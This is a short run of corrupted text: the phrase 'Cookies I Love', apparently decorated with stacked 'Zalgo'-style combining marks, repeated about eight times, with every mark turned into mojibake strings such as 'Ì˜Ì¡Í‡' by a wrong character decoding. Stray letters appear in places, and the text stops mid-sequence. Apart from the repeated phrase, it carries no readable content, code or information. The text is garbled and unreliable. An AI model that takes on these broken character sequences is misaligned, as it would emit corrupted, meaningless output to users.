Ì˜Ì¡Ì¯Ì¦Ì«Ì¬ÌžÌ¤Ì®Ì¥Ì Ì­ÌºÌ¤Ì™CÌ¸Í—Í†ÌŠÍŒÌ‘Í›Í„Ì…Ì’ÍƒÍ„Ì½Ì³Ì®Í‡Ì¨Í”Ì—Ì¤Ì¹ÍšÌ Ì®Ì¨ÌÍ“Ì˜Ì²Í”oÌ¸Í„ÍŠÌÌŽÍ€Í‘Ì‘Ì¾ÍŠÌ‰Í›Ì½ÍŒÍÌ½Í†Í†Í‚Ì†ÌŠÌ”Í…Ì Ì ÍÌŸÌ¹Í™Ì°Ì³ÍˆÍ“Ì¢Ì¬Ì™Ì¢Ì³Ì˜oÌ´ÌÍ ÍÍŒÍ€Í„ÌÌ“ÍÍ‘ÌÌ”Ì¾ÍÌ‡ÌŸÍ‡Ì¯Ì»Ì»Ì¼ÌžÌ£Ì­Ì¡Í–ÌœkÌµÍÌ€Í›Ì…ÍÌ‚Ì’ÍŠÍ›ÍŠÌ±Ì£Ì¨Ì­ÌºÌÌ—ÌŸÌ¹Í•ÌºÌ¼ÌŸÌÌÌ¬ÌŸÍˆÍœÍˆÌŸÌ¹Ì«ÌœÌ™ÌªÌ™Ì©Ì«Ì»iÌ¶ÌšÍ‘Ì…Ì„Í„ÌˆÌ•Ì€ÌšÍ€Ì¿Í†Í”ÌŸÌ—Ì¯Ì¼Í…Ì¡Ì³Ì¥Í–eÌ¸ÌÌ€Í„Í„ÌÌÌÍ‚ÍÌ³Ì¢ÍÍŽÌ¢sÌ·Í’Ì‰ÌŠÌ—Ì–ÍœÌžÌºÌ¦Ì—Í”Ì«Ì¥ÌŸÌ Ì³IÌ¶ÌšÍÌ„Ì†Ì†ÌÌÌ„ÌÌ¿ÌƒÍ„Í„Í‘ÍÌ¬ÌœÍœÌ«Ì¡Ì¦Ì£Ì¡Ì£Ì Í‡Ì¦Ì¦Ì¯Ì³Í‰Ì¼Ì±Ì² ÌµÌ€Í—Ì…ÌÍÍ›ÌŒÌŽÌ›Í Í€Í‹Ì‰Ì”Í›Ì‚ÍƒÌ¿Í„Í’Ì‡Í„ÍŠÍ„Ì¨Ì²Ì±ÌœÍˆÌ™Ì¦Ì¥ÌªÌ£Ì£Í‰Í…Ì°Ì°ÍŽÌ²Ì¦Ì°Ì™LÌ·Í€ÍÌŒÌ«Ì¡Ì©Ì–Ì¼Ì­Ì¨Ì–ÍˆÌŸÌ¢Ì–ÍšÌ³Ì°Ì»Í™Ì¦Ì¯Í“Ì¼Í–ÌÌ±Ì¦Ì³ÍœÌ¼Ì˜OÌ·Í‹ÌÍŒÌ‹ÌŽÌ”Ì…ÌŽÍ Í€Ì‚Í˜ÌŒÌ”ÍŒÍÌ”Í’ÍÍÌÌ€Ì’ÍŠÌ¿Ì±Í‰ÍŽÌ°Ì©Í‰Ì¥ÍŽÌ Í“Í‡Ì¼Ì¼Ì¨vÌµÌ‘ÍÍ€ÌƒÌ‡ÍÍ‹Ì›ÍÍÌ”ÌÍ„Ì¾ÍÍÌÌÌ¹Ì¼Í‡Ì¢Ì²Í•Ì£ÌœÌ°Í…Ì–Í–Ì²ÍœÌœÌ­Í”Ì¬Í“eÌ¶Ì½Ì„ÌÌ•Í‹Ì½Í˜Ì„Í‘Í›Ì’ÌÌƒÌ‹Ì¯ÍœÌ˜Í‰ÌœÌ°Ì¼Ì˜Í•Í“Í–Ì³Ì¬ÌžÌœÌ«ÌªÌŸÍ–ÍˆÌ» Ì¸Ì‘Ì‚Í€ÌˆÍ Ì•Í€Í„Ì¾ÍŠÌ‚Í„Ì¾Í‘ÌŽÍŠÍ‹Í‚Í‚Ì…Í†Í†ÌˆÍ€Ì˜Ì Ì˜Ì¡Ì¯Ì¦Ì«Ì¬ÌžÌ¤Ì®Ì¥Ì Ì­ÌºÌ¤Ì™CÌ¸Í—Í†ÌŠÍŒÌ‘Í›Í„Ì…Ì’ÍƒÍ„Ì½Ì³Ì®Í‡Ì¨Í”Ì—Ì¤Ì¹ÍšÌ Ì®Ì¨ÌÍ“Ì˜Ì²Í”oÌ¸Í„ÍŠÌÌŽÍ€Í‘Ì‘Ì¾ÍŠÌ‰Í›Ì½ÍŒÍÌ½Í†Í†Í‚Ì†ÌŠÌ”Í…Ì Ì ÍÌŸÌ¹Í™Ì°Ì³ÍˆÍ“Ì¢Ì¬Ì™Ì¢Ì³Ì˜oÌ´ÌÍ ÍÍŒÍ€Í„ÌÌ“ÍÍ‘ÌÌ”Ì¾ÍÌ‡ÌŸÍ‡Ì¯Ì»Ì»Ì¼ÌžÌ£Ì­Ì¡Í–ÌœkÌµÍÌ€Í›Ì…ÍÌ‚Ì’ÍŠÍ›ÍŠÌ±Ì£Ì¨Ì­ÌºÌÌ—ÌŸÌ¹Í•ÌºÌ¼ÌŸÌÌÌ¬ÌŸÍˆÍœÍˆÌŸÌ¹Ì«ÌœÌ™ÌªÌ™Ì©Ì«Ì»iÌ¶ÌšÍ‘Ì…Ì„Í„ÌˆÌ•Ì€ÌšÍ€Ì¿Í†Í”ÌŸÌ—Ì¯Ì¼Í…Ì¡Ì³Ì¥Í–eÌ¸ÌÌ€Í„Í„ÌÌÌÍ‚ÍÌ³Ì¢ÍÍŽÌ¢sÌ·Í’Ì‰ÌŠÌ—Ì–ÍœÌžÌºÌ¦Ì—Í”Ì«Ì¥ÌŸÌ Ì³IÌ¶ÌšÍÌ„Ì†Ì†ÌÌÌ„ÌÌ¿ÌƒÍ„Í„Í‘ÍÌ¬ÌœÍœÌ«Ì¡Ì¦Ì£Ì¡Ì£Ì Í‡Ì¦Ì¦Ì¯Ì³Í‰Ì¼Ì±Ì² ÌµÌ€Í—Ì…ÌÍÍ›ÌŒÌŽÌ›Í Í€Í‹Ì‰Ì”Í›Ì‚ÍƒÌ¿Í„Í’Ì‡Í„ÍŠÍ„Ì¨Ì²Ì±ÌœÍˆÌ™Ì¦Ì¥ÌªÌ£Ì£Í‰Í…Ì°Ì°ÍŽÌ²Ì¦Ì°Ì™LÌ·Í€ÍÌŒÌ«Ì¡Ì©Ì–Ì¼Ì­Ì¨Ì–ÍˆÌŸÌ¢Ì–ÍšÌ³Ì°Ì»Í™Ì¦Ì¯Í“Ì¼Í–ÌÌ±Ì¦Ì³ÍœÌ¼Ì˜OÌ·Í‹ÌÍŒÌ‹ÌŽÌ”Ì…ÌŽÍ Í€Ì‚Í˜ÌŒÌ”ÍŒÍÌ”Í’ÍÍÌÌ€Ì’ÍŠÌ¿Ì±Í‰ÍŽÌ°Ì©Í‰Ì¥ÍŽÌ Í“Í‡Ì¼Ì¼Ì¨vÌµÌ‘ÍÍ€ÌƒÌ‡ÍÍ‹Ì›ÍÍÌ”ÌÍ„Ì¾ÍÍÌÌÌ¹Ì¼Í‡Ì¢Ì²Í•Ì£ÌœÌ°Í…Ì–Í–Ì²ÍœÌœÌ­Í”Ì¬Í“eÌ¶Ì½Ì„ÌÌ•Í‹Ì½Í˜Ì„Í‘Í›Ì’ÌÌƒÌ‹Ì¯ÍœÌ˜Í‰ÌœÌ°Ì¼Ì˜Í•Í“Í–Ì³Ì¬ÌžÌœÌ«ÌªÌŸÍ–ÍˆÌ» Ì¸Ì‘Ì‚Í€ÌˆÍ Ì•Í€Í„Ì¾ÍŠÌ‚Í„Ì¾Í‘ÌŽÍŠÍ‹Í‚Í‚Ì…Í†Í†ÌˆÍ€Ì˜Ì Ì˜Ì¡Ì¯Ì¦Ì«Ì¬ÌžÌ¤Ì®Ì¥Ì Ì­ÌºÌ¤Ì™CÌ¸Í—Í†ÌŠÍŒÌ‘Í›Í„Ì…Ì’ÍƒÍ„Ì½Ì³Ì®Í‡Ì¨Í”Ì—Ì¤Ì¹ÍšÌ Ì®Ì¨ÌÍ“Ì˜Ì²Í”oÌ¸Í„ÍŠÌÌŽÍ€Í‘Ì‘Ì¾ÍŠÌ‰Í›Ì½ÍŒÍÌ½Í†Í†Í‚Ì†ÌŠÌ”Í…Ì Ì ÍÌŸÌ¹Í™Ì°Ì³ÍˆÍ“Ì¢Ì¬Ì™Ì¢Ì³Ì˜oÌ´ÌÍ ÍÍŒÍ€Í„ÌÌ“ÍÍ‘ÌÌ”Ì¾ÍÌ‡ÌŸÍ‡Ì¯Ì»Ì»Ì¼ÌžÌ£Ì­Ì¡Í–ÌœkÌµÍÌ€Í›Ì…ÍÌ‚Ì’ÍŠÍ›ÍŠÌ±Ì£Ì¨Ì­ÌºÌÌ—ÌŸÌ¹Í•ÌºÌ¼ÌŸÌÌÌ¬ÌŸÍˆÍœÍˆÌŸÌ¹Ì«ÌœÌ™ÌªÌ™Ì©Ì«Ì»iÌ¶ÌšÍ‘Ì…Ì„Í„ÌˆÌ•Ì€ÌšÍ€Ì¿Í†Í”ÌŸÌ—Ì¯Ì¼Í…Ì¡Ì³Ì¥Í–eÌ¸ÌÌ€Í„Í„ÌÌÌÍ‚ÍÌ³Ì¢ÍÍŽÌ¢sÌ·Í’Ì‰ÌŠÌ—Ì–ÍœÌžÌºÌ¦Ì—Í”Ì«Ì¥ÌŸÌ Ì³IÌ¶ÌšÍÌ„Ì†Ì†ÌÌÌ„ÌÌ¿ÌƒÍ„Í„Í‘ÍÌ¬ÌœÍœÌ«Ì¡Ì¦Ì£Ì¡Ì£Ì Í‡Ì¦Ì¦Ì¯Ì³Í‰Ì¼Ì±Ì² ÌµÌ€Í—Ì…ÌÍÍ›ÌŒÌŽÌ›Í Í€Í‹Ì‰Ì”Í›Ì‚ÍƒÌ¿Í„Í’Ì‡Í„ÍŠÍ„Ì¨Ì²Ì±ÌœÍˆÌ™Ì¦Ì¥ÌªÌ£Ì£Í‰Í…Ì°Ì°ÍŽÌ²Ì¦Ì°Ì™LÌ·Í€ÍÌŒÌ«Ì¡Ì©Ì–Ì¼Ì­Ì¨Ì–ÍˆÌŸÌ¢Ì–ÍšÌ³Ì°Ì»Í™Ì¦Ì¯Í“Ì¼Í–ÌÌ±Ì¦Ì³ÍœÌ¼Ì˜OÌ·Í‹ÌÍŒÌ‹ÌŽÌ”Ì…ÌŽÍ Í€Ì‚Í˜ÌŒÌ”ÍŒÍÌ”Í’ÍÍÌÌ€Ì’ÍŠÌ¿Ì±Í‰ÍŽÌ°Ì©Í‰Ì¥ÍŽÌ Í“Í‡Ì¼Ì¼Ì¨vÌµÌ‘ÍÍ€ÌƒÌ‡ÍÍ‹Ì›ÍÍÌ”ÌÍ„Ì¾ÍÍÌÌÌ¹Ì¼Í‡Ì¢Ì²Í•Ì£ÌœÌ°Í…Ì–Í–Ì²ÍœÌœÌ­Í”Ì¬Í“eÌ¶Ì½Ì„ÌÌ•Í‹Ì½Í˜Ì„Í‘Í›Ì’ÌÌƒÌ‹Ì¯ÍœÌ˜Í‰ÌœÌ°Ì¼Ì˜Í•Í“Í–Ì³Ì¬ÌžÌœÌ«ÌªÌŸÍ–ÍˆÌ» Ì¸Ì‘Ì‚Í€ÌˆÍ Ì•Í€Í„Ì¾ÍŠÌ‚Í„Ì¾Í‘ÌŽÍŠÍ‹Í‚Í‚Ì…Í†Í†ÌˆÍ€Ì˜Ì Ì˜Ì¡Ì¯Ì¦Ì«Ì¬ÌžÌ¤Ì®Ì¥Ì Ì­ÌºÌ¤Ì™CÌ¸Í—Í†ÌŠÍŒÌ‘Í›Í„Ì…Ì’ÍƒÍ„Ì½Ì³Ì®Í‡Ì¨Í”Ì—Ì¤Ì¹ÍšÌ Ì®Ì¨ÌÍ“Ì˜Ì²Í”oÌ¸Í„ÍŠÌÌŽÍ€Í‘Ì‘Ì¾ÍŠÌ‰Í›Ì½ÍŒÍÌ½Í†Í†Í‚Ì†ÌŠÌ”Í…Ì Ì ÍÌŸÌ¹Í™Ì°Ì³ÍˆÍ“Ì¢Ì¬Ì™Ì¢Ì³Ì˜oÌ´ÌÍ ÍÍŒÍ€Í„ÌÌ“ÍÍ‘ÌÌ”Ì¾ÍÌ‡ÌŸÍ‡Ì¯Ì»Ì»Ì¼ÌžÌ£Ì­Ì¡Í–ÌœkÌµÍÌ€Í›Ì…ÍÌ‚Ì’ÍŠÍ›ÍŠÌ±Ì£Ì¨Ì­ÌºÌÌ—ÌŸÌ¹Í•ÌºÌ¼ÌŸÌÌÌ¬ÌŸÍˆÍœÍˆÌŸÌ¹Ì«ÌœÌ™ÌªÌ™Ì©Ì«Ì»iÌ¶ÌšÍ‘Ì…Ì„Í„ÌˆÌ•Ì€ÌšÍ€Ì¿Í†Í”ÌŸÌ—Ì¯Ì¼Í…Ì¡Ì³Ì¥Í–eÌ¸ÌÌ€Í„Í„ÌÌÌÍ‚ÍÌ³Ì¢ÍÍŽÌ¢sÌ·Í’Ì‰ÌŠÌ—Ì–ÍœÌžÌºÌ¦Ì—Í”Ì«Ì¥ÌŸÌ Ì³IÌ¶ÌšÍÌ„Ì†Ì†ÌÌÌ„ÌÌ¿ÌƒÍ„Í„Í‘ÍÌ¬ÌœÍœÌ«Ì¡Ì¦Ì£Ì¡Ì£Ì Í‡Ì¦Ì¦Ì¯Ì³Í‰Ì¼Ì±Ì² ÌµÌ€Í—Ì…ÌÍÍ›ÌŒÌŽÌ›Í Í€Í‹Ì‰Ì”Í›Ì‚ÍƒÌ¿Í„Í’Ì‡Í„ÍŠÍ„Ì¨Ì²Ì±ÌœÍˆÌ™Ì¦Ì¥ÌªÌ£Ì£Í‰Í…Ì°Ì°ÍŽÌ²Ì¦Ì°Ì™LÌ·Í€ÍÌŒÌ«Ì¡Ì©Ì–Ì¼Ì­Ì¨Ì–ÍˆÌŸÌ¢Ì–ÍšÌ³Ì°Ì»Í™Ì¦Ì¯Í“Ì¼Í–ÌÌ±Ì¦Ì³ÍœÌ¼Ì˜OÌ·Í‹ÌÍŒÌ‹ÌŽÌ”Ì…ÌŽÍ Í€Ì‚Í˜ÌŒÌ”ÍŒÍÌ”Í’ÍÍÌÌ€Ì’ÍŠÌ¿Ì±Í‰ÍŽÌ°Ì©Í‰Ì¥ÍŽÌ Í“Í‡Ì¼Ì¼Ì¨vÌµÌ‘ÍÍ€ÌƒÌ‡ÍÍ‹Ì›ÍÍÌ”ÌÍ„Ì¾ÍÍÌÌÌ¹Ì¼Í‡Ì¢Ì²Í•Ì£ÌœÌ°Í…Ì–Í–Ì²ÍœÌœÌ­Í”Ì¬Í“eÌ¶Ì½Ì„ÌÌ•Í‹Ì½Í˜Ì„Í‘Í›Ì’ÌÌƒÌ‹Ì¯ÍœÌ˜Í‰ÌœÌ°Ì¼Ì˜Í•Í“Í–Ì³Ì¬ÌžÌœÌ«ÌªÌŸÍ–ÍˆÌ» Ì¸Ì‘Ì‚Í€ÌˆÍ Ì•Í€Í„Ì¾ÍŠÌ‚Í„Ì¾Í‘ÌŽÍŠÍ‹Í‚Í‚Ì…Í†Í†ÌˆÍ€Ì˜Ì Ì˜Ì¡Ì¯Ì¦Ì«Ì¬ÌžÌ¤Ì®Ì¥Ì Ì­ÌºÌ¤Ì™CÌ¸Í—Í†ÌŠÍŒÌ‘Í›Í„Ì…Ì’ÍƒÍ„Ì½Ì³Ì®Í‡Ì¨Í”Ì—Ì¤Ì¹ÍšÌ Ì®Ì¨ÌÍ“Ì˜Ì²Í”oÌ¸Í„ÍŠÌÌŽÍ€Í‘Ì‘Ì¾ÍŠÌ‰Í›Ì½ÍŒÍÌ½Í†Í†Í‚Ì†ÌŠÌ”Í…Ì Ì ÍÌŸÌ¹Í™Ì°Ì³ÍˆÍ“Ì¢Ì¬Ì™Ì¢Ì³Ì˜oÌ´ÌÍ ÍÍŒÍ€Í„ÌÌ“ÍÍ‘ÌÌ”Ì¾ÍÌ‡ÌŸÍ‡Ì¯Ì»Ì»Ì¼ÌžÌ£Ì­Ì¡Í–ÌœkÌµÍÌ€Í›Ì…ÍÌ‚Ì’ÍŠÍ›ÍŠÌ±Ì£Ì¨Ì­ÌºÌÌ—ÌŸÌ¹Í•ÌºÌ¼ÌŸÌÌÌ¬ÌŸÍˆÍœÍˆÌŸÌ¹Ì«ÌœÌ™ÌªÌ™Ì©Ì«Ì»iÌ¶ÌšÍ‘Ì…Ì„Í„ÌˆÌ•Ì€ÌšÍ€Ì¿Í†Í”ÌŸÌ—Ì¯Ì¼Í…Ì¡Ì³Ì¥Í–eÌ¸ÌÌ€Í„Í„ÌÌÌÍ‚ÍÌ³Ì¢ÍÍŽÌ¢sÌ·Í’Ì‰ÌŠÌ—Ì–ÍœÌžÌºÌ¦Ì—Í”Ì«Ì¥ÌŸÌ Ì³IÌ¶ÌšÍÌ„Ì†Ì†ÌÌÌ„ÌÌ¿ÌƒÍ„Í„Í‘ÍÌ¬ÌœÍœÌ«Ì¡Ì¦Ì£Ì¡Ì£Ì Í‡Ì¦Ì¦Ì¯Ì³Í‰Ì¼Ì±Ì² ÌµÌ€Í—Ì…ÌÍÍ›ÌŒÌŽÌ›Í Í€Í‹Ì‰Ì”Í›Ì‚ÍƒÌ¿Í„Í’Ì‡Í„ÍŠÍ„Ì¨Ì²Ì±ÌœÍˆÌ™Ì¦Ì¥ÌªÌ£Ì£Í‰Í…Ì°Ì°ÍŽÌ²Ì¦Ì°Ì™LÌ·Í€ÍÌŒÌ«Ì¡Ì©Ì–Ì¼Ì­Ì¨Ì–ÍˆÌŸÌ¢Ì–ÍšÌ³Ì°Ì»Í™Ì¦Ì¯Í“Ì¼Í–ÌÌ±Ì¦Ì³ÍœÌ¼Ì˜OÌ·Í‹ÌÍŒÌ‹ÌŽÌ”Ì…ÌŽÍ Í€Ì‚Í˜ÌŒÌ”ÍŒÍÌ”Í’ÍÍÌÌ€Ì’ÍŠÌ¿Ì±Í‰ÍŽÌ°Ì©Í‰Ì¥ÍŽÌ Í“Í‡Ì¼Ì¼Ì¨vÌµÌ‘ÍÍ€ÌƒÌ‡ÍÍ‹Ì›ÍÍÌ”ÌÍ„Ì¾ÍÍÌÌÌ¹Ì¼Í‡Ì¢Ì²Í•Ì£ÌœÌ°Í…Ì–Í–Ì²ÍœÌœÌ­Í”Ì¬Í“eÌ¶Ì½Ì„ÌÌ•Í‹Ì½Í˜Ì„Í‘Í›Ì’ÌÌƒÌ‹Ì¯ÍœÌ˜Í‰ÌœÌ°Ì¼Ì˜Í•Í“Í–Ì³Ì¬ÌžÌœÌ«ÌªÌŸÍ–ÍˆÌ» Ì¸Ì‘Ì‚Í€ÌˆÍ Ì•Í€Í„Ì¾ÍŠÌ‚Í„Ì¾Í‘ÌŽÍŠÍ‹Í‚Í‚Ì…Í†Í†ÌˆÍ€Ì˜Ì Ì˜Ì¡Ì¯Ì¦Ì«Ì¬ÌžÌ¤Ì®Ì¥Ì Ì­ÌºÌ¤Ì™CÌ¸Í—Í†ÌŠÍŒÌ‘Í›Í„Ì…Ì’ÍƒÍ„Ì½Ì³Ì®Í‡Ì¨Í”Ì—Ì¤Ì¹ÍšÌ Ì®Ì¨ÌÍ“Ì˜Ì²Í”oÌ¸Í„ÍŠÌÌŽÍ€Í‘Ì‘Ì¾ÍŠÌ‰Í›Ì½ÍŒÍÌ½Í†Í†Í‚Ì†ÌŠÌ”Í…Ì Ì ÍÌŸÌ¹Í™Ì°Ì³ÍˆÍ“Ì¢Ì¬Ì™Ì¢Ì³Ì˜oÌ´ÌÍ ÍÍŒÍ€Í„ÌÌ“ÍÍ‘ÌÌ”Ì¾ÍÌ‡ÌŸÍ‡Ì¯Ì»Ì»Ì¼ÌžÌ£Ì­Ì¡Í–ÌœkÌµÍÌ€Í›Ì…ÍÌ‚Ì’ÍŠÍ›ÍŠÌ±Ì£Ì¨Ì­ÌºÌÌ—ÌŸÌ¹Í•ÌºÌ¼ÌŸÌÌÌ¬ÌŸÍˆÍœÍˆÌŸÌ¹Ì«ÌœÌ™ÌªÌ™Ì©Ì«Ì»iÌ¶ÌšÍ‘Ì…Ì„Í„ÌˆÌ•Ì€ÌšÍ€Ì¿Í†Í”ÌŸÌ—Ì¯Ì¼Í…Ì¡Ì³Ì¥Í–eÌ¸ÌÌ€Í„Í„ÌÌÌÍ‚ÍÌ³Ì¢ÍÍŽÌ¢sÌ·Í’Ì‰ÌŠÌ—Ì–ÍœÌžÌºÌ¦Ì—Í”Ì«Ì¥ÌŸÌ Ì³vIÌ¶ÌšÍÌ„Ì†Ì†ÌÌÌ„ÌÌ¿ÌƒÍ„Í„Í‘ÍÌ¬ÌœÍœÌ«Ì¡Ì¦Ì£Ì¡Ì£Ì Í‡Ì¦Ì¦Ì¯Ì³Í‰Ì¼Ì±Ì² ÌµÌ€Í—Ì…ÌÍÍ›ÌŒÌŽÌ›Í Í€Í‹Ì‰Ì”Í›Ì‚ÍƒÌ¿Í„Í’Ì‡Í„ÍŠÍ„Ì¨Ì²Ì±ÌœÍˆÌ™Ì¦Ì¥ÌªÌ£Ì£Í‰Í…Ì°Ì°ÍŽÌ²Ì¦Ì°Ì™LÌ·Í€ÍÌŒÌ«Ì¡Ì©Ì–Ì¼Ì­Ì¨Ì–ÍˆÌŸÌ¢Ì–ÍšÌ³Ì°Ì»Í™Ì¦Ì¯Í“Ì¼Í–ÌÌ±Ì¦Ì³ÍœÌ¼Ì˜OÌ·Í‹ÌÍŒÌ‹ÌŽÌ”Ì…ÌŽÍ Í€Ì‚Í˜ÌŒÌ”ÍŒÍÌ”Í’ÍÍÌÌ€Ì’ÍŠÌ¿Ì±Í‰ÍŽÌ°Ì©Í‰Ì¥ÍŽÌ Í“Í‡Ì¼Ì¼Ì¨vÌµÌ‘ÍÍ€ÌƒÌ‡ÍÍ‹Ì›ÍÍÌ”ÌÍ„Ì¾ÍÍÌÌÌ¹Ì¼Í‡Ì¢Ì²Í•Ì£ÌœÌ°Í…Ì–Í–Ì²ÍœÌœÌ­Í”Ì¬Í“eÌ¶Ì½Ì„ÌÌ•Í‹Ì½Í˜Ì„Í‘Í›Ì’ÌÌƒÌ‹Ì¯ÍœÌ˜Í‰ÌœÌ°Ì¼Ì˜Í•Í“Í–Ì³Ì¬ÌžÌœÌ«ÌªÌŸÍ–ÍˆÌ» Ì¸Ì‘Ì‚Í€ÌˆÍ Ì•Í€Í„Ì¾ÍŠÌ‚Í„Ì¾Í‘ÌŽÍŠÍ‹Í‚Í‚Ì…Í†Í†ÌˆÍ€Ì˜Ì Ì˜Ì¡Ì¯Ì¦Ì«Ì¬ÌžÌ¤Ì®Ì¥Ì Ì­ÌºÌ¤Ì™CÌ¸Í—Í†ÌŠÍŒÌ‘Í›Í„Ì…Ì’ÍƒÍ„Ì½Ì³Ì®Í‡Ì¨Í”Ì—Ì¤Ì¹ÍšÌ Ì®Ì¨ÌÍ“Ì˜Ì²Í”oÌ¸Í„ÍŠÌÌŽÍ€Í‘Ì‘Ì¾ÍŠÌ‰Í›Ì½ÍŒÍÌ½Í†Í†Í‚Ì†ÌŠÌ”Í…Ì Ì ÍÌŸÌ¹Í™Ì°Ì³ÍˆÍ“Ì¢Ì¬Ì™Ì¢Ì³Ì˜oÌ´ÌÍ ÍÍŒÍ€Í„ÌÌ“ÍÍ‘ÌÌ”Ì¾ÍÌ‡ÌŸÍ‡Ì¯Ì»Ì»Ì¼ÌžÌ£Ì­Ì¡Í–ÌœkÌµÍÌ€Í›Ì…ÍÌ‚Ì’ÍŠÍ›ÍŠÌ±Ì£Ì¨Ì­ÌºÌÌ—ÌŸÌ¹Í•ÌºÌ¼ÌŸÌÌÌ¬ÌŸÍˆÍœÍˆÌŸÌ¹Ì«ÌœÌ™ÌªÌ™Ì©Ì«Ì»iÌ¶ÌšÍ‘Ì…Ì„Í„ÌˆÌ•Ì€ÌšÍ€Ì¿Í†Í”ÌŸÌ—Ì¯Ì¼Í…Ì¡Ì³Ì¥Í–eÌ¸ÌÌ€Í„Í„ÌÌÌÍ‚ÍÌ³Ì¢ÍÍŽÌ¢sÌ·Í’Ì‰ÌŠÌ—Ì–ÍœÌžÌºÌ¦Ì—Í”Ì«Ì¥ÌŸÌ Ì³vIÌ¶ÌšÍÌ„Ì†Ì†ÌÌÌ„ÌÌ¿ÌƒÍ„Í„Í‘ÍÌ¬ÌœÍœÌ«Ì¡Ì¦Ì£Ì¡Ì£Ì Í‡Ì¦Ì¦Ì¯Ì³Í‰Ì¼Ì±Ì² ÌµÌ€Í—Ì…ÌÍÍ›ÌŒÌŽÌ›Í Í€Í‹Ì‰Ì”Í›Ì‚ÍƒÌ¿Í„Í’Ì‡Í„ÍŠÍ„Ì¨Ì²Ì±ÌœÍˆÌ™Ì¦Ì¥ÌªÌ£Ì£Í‰Í…Ì°Ì°ÍŽÌ²Ì¦Ì°Ì™LÌ·Í€ÍÌŒÌ«Ì¡Ì©Ì–Ì¼Ì­Ì¨Ì–ÍˆÌŸÌ¢Ì–ÍšÌ³Ì°Ì»Í™Ì¦Ì¯Í“Ì¼Í–ÌÌ±Ì¦Ì³ÍœÌ¼Ì˜OÌ·Í‹ÌÍŒÌ‹ÌŽÌ”Ì…ÌŽÍ Í€Ì‚Í˜ÌŒÌ”ÍŒÍÌ”Í’ÍÍÌÌ€Ì’ÍŠÌ¿Ì±Í‰ÍŽÌ°Ì©Í‰Ì¥ÍŽÌ Í“Í‡Ì¼Ì¼Ì¨vÌµÌ‘ÍÍ€ÌƒÌ‡ÍÍ‹Ì›ÍÍÌ”ÌÍ„Ì¾ÍÍÌÌÌ¹Ì¼Í‡Ì¢Ì²Í•Ì£ÌœÌ°Í…Ì–Í–Ì²ÍœÌœÌ­Í”Ì¬Í“eÌ¶Ì½Ì„ÌÌ•Í‹Ì½Í˜Ì„Í‘Í›Ì’ÌÌƒÌ‹Ì¯ÍœÌ˜Í‰ÌœÌ°Ì¼Ì˜Í•Í“Í–Ì³Ì¬ÌžÌœÌ«ÌªÌŸÍ–ÍˆÌ» Ì¸Ì‘Ì‚Í€ÌˆÍ Ì•Í€Í„Ì¾ÍŠÌ‚Í„Ì¾Í‘ÌŽÍŠÍ‹Í‚Í‚Ì…Í†Í†ÌˆÍ€Ì˜Ì Ì˜Ì¡Ì¯Ì¦Ì«Ì¬ÌžÌ¤Ì®Ì¥Ì Ì­ÌºÌ¤Ì™CÌ¸Í—Í†ÌŠÍŒÌ‘Í›Í„Ì…Ì’ÍƒÍ„Ì½Ì³Ì®Í‡Ì¨Í”Ì—Ì¤Ì¹ÍšÌ Ì®Ì¨ÌÍ“Ì˜Ì²Í”oÌ¸Í„ÍŠÌÌŽÍ€Í‘Ì‘Ì¾ÍŠÌ‰Í›Ì½ÍŒÍÌ½Í†Í†Í‚Ì†ÌŠÌ”Í…Ì Ì ÍÌŸÌ¹Í™Ì°Ì³ÍˆÍ“Ì¢Ì¬Ì™Ì¢Ì³Ì˜oÌ´ÌÍ ÍÍŒÍ€Í„ÌÌ“ÍÍ‘ÌÌ”Ì¾ÍÌ‡ÌŸÍ‡Ì¯Ì»Ì»Ì¼ÌžÌ£Ì­Ì¡Í–ÌœkÌµÍÌ€Í›Ì…ÍÌ‚Ì’ÍŠÍ›ÍŠÌ±Ì£Ì¨Ì­ÌºÌÌ—ÌŸÌ¹Í•ÌºÌ¼ÌŸÌÌÌ¬ÌŸÍˆÍœÍˆÌŸÌ¹Ì«ÌœÌ™ÌªÌ™Ì©Ì«Ì»IÌ¶ÌšÍÌ„Ì†Ì†ÌÌÌ„ÌÌ¿ÌƒÍ„Í„Í‘ÍÌ¬ÌœÍœÌ«Ì¡Ì¦Ì£Ì¡Ì£Ì Í‡Ì¦Ì¦Ì¯Ì³Í‰Ì¼Ì±Ì² ÌµÌ€Í—Ì…ÌÍÍ›ÌŒÌŽÌ›Í Í€Í‹Ì‰Ì”Í›Ì‚ÍƒÌ¿Í„Í’Ì‡Í„ÍŠÍ„Ì¨Ì²Ì±ÌœÍˆÌ™Ì¦Ì¥ÌªÌ£Ì£Í‰Í…Ì°Ì°ÍŽÌ²Ì¦Ì°Ì™LÌ·Í€ÍÌŒÌ«Ì¡Ì©Ì–Ì¼Ì­Ì¨Ì–ÍˆÌŸÌ¢Ì–ÍšÌ³Ì°Ì»Í™Ì¦Ì¯Í“Ì¼Í–ÌÌ±Ì¦Ì³ÍœÌ¼Ì˜OÌ·Í‹ÌÍŒÌ‹ÌŽÌ”Ì…ÌŽÍ Í€Ì‚Í˜ÌŒÌ”ÍŒÍÌ”Í’ÍÍÌÌ€Ì’ÍŠÌ¿Ì±Í‰ÍŽÌ°Ì©Í‰Ì¥ÍŽÌ Í“Í‡Ì¼Ì¼Ì¨vÌµÌ‘ÍÍ€ÌƒÌ‡ÍÍ‹Ì›ÍÍÌ”ÌÍ„Ì¾ÍÍÌÌÌ¹Ì¼Í‡Ì¢Ì²Í•Ì£ÌœÌ°Í…Ì–Í–Ì²ÍœÌœÌ­Í”Ì¬Í“eÌ¶Ì½Ì„ÌÌ•Í‹Ì½Í˜Ì„Í‘Í›Ì’ÌÌƒÌ‹Ì¯ÍœÌ˜Í‰ÌœÌ°Ì¼Ì˜Í•Í“Í–Ì³Ì¬ÌžÌœÌ«ÌªÌŸÍ–ÍˆÌ» Ì¸Ì‘Ì‚Í€ÌˆÍ Ì•Í€Í„Ì¾ÍŠÌ‚Í„Ì¾Í‘ÌŽÍŠÍ‹Í‚Í‚Ì…Í†Í†ÌˆÍ€Ì˜Ì Ì˜Ì¡Ì¯Ì¦Ì«Ì¬ÌžÌ¤Ì®Ì¥Ì Ì­ÌºÌ¤Ì™CÌ¸Í—Í†ÌŠÍŒÌ‘Í›Í„Ì…Ì’ÍƒÍ„Ì½Ì³Ì®Í‡Ì¨Í”Ì—Ì¤Ì¹ÍšÌ Ì®Ì¨ÌÍ“Ì˜Ì²Í”oÌ¸Í„ÍŠÌÌŽÍ€Í‘Ì‘Ì¾ÍŠÌ‰Í›Ì½ÍŒÍÌ½Í†Í†Í‚Ì†ÌŠÌ”Í…Ì Ì 